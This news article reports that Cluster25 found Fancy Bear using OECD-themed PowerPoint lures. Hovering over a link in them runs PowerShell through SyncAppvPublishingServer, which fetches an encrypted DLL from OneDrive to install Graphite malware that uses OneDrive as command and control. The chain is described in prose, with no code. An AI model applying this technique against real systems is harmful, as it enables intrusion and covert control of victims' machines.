Fancy Bear hackers exploit PowerPoint files to spread Graphite malware

Fancy Bear

Fancy Bear, a hacking group affiliated with Russia's military intelligence service GRU, has struck again with a novel code execution technique, warns threat intelligence firm Cluster25.

The attack utilizes mouse movements within Microsoft PowerPoint presentations to execute a malicious PowerShell script via the SyncAppvPublishingServer utility.


CIO Priorities: 2020 vs 2023

Zero Trust, SaaS Security, and its impact on SD-WAN being a priority


The mouse-over technique is being leveraged to spread Graphite malware. Targets are lured with PowerPoint (.PPT) files that appear to be affiliated with the Organization for Economic Co-operation and Development (OECD).

Inside the PPT file are two slides, featuring instructions in English and French for using the Interpretation option in Zoom video-conferencing app.

“When opening the lure document in presentation mode and the victim hovers the mouse over a hyperlink, a malicious PowerShell script is activated to download a JPEG file (“DSC0002.jpeg”) from a Microsoft OneDrive account,” explained Cluster25.

“The JPEG is an encrypted DLL file (lmapi2.dll), that is decrypted and dropped in the 'C:\ProgramData\' directory, later executed via rundll32.exe. A registry key for persistence is also created for the DLL.”

Following deobfuscation, the resulting payload— Graphite malware—exploits the Microsoft Graph API and OneDrive to communicate with the command and control (C2) server. For accessing the service, the threat actor uses a fixed client ID and a valid OAuth2 token.

“Graphite malware's purpose is to allow the attacker to load other malware into system memory. It has been documented back in January by researchers at Trellix, a merger of McAfee Enterprise and FireEye, who named it so specifically because it leverages the Microsoft Graph API to use OneDrive as C2,” reports Bleeping Computer.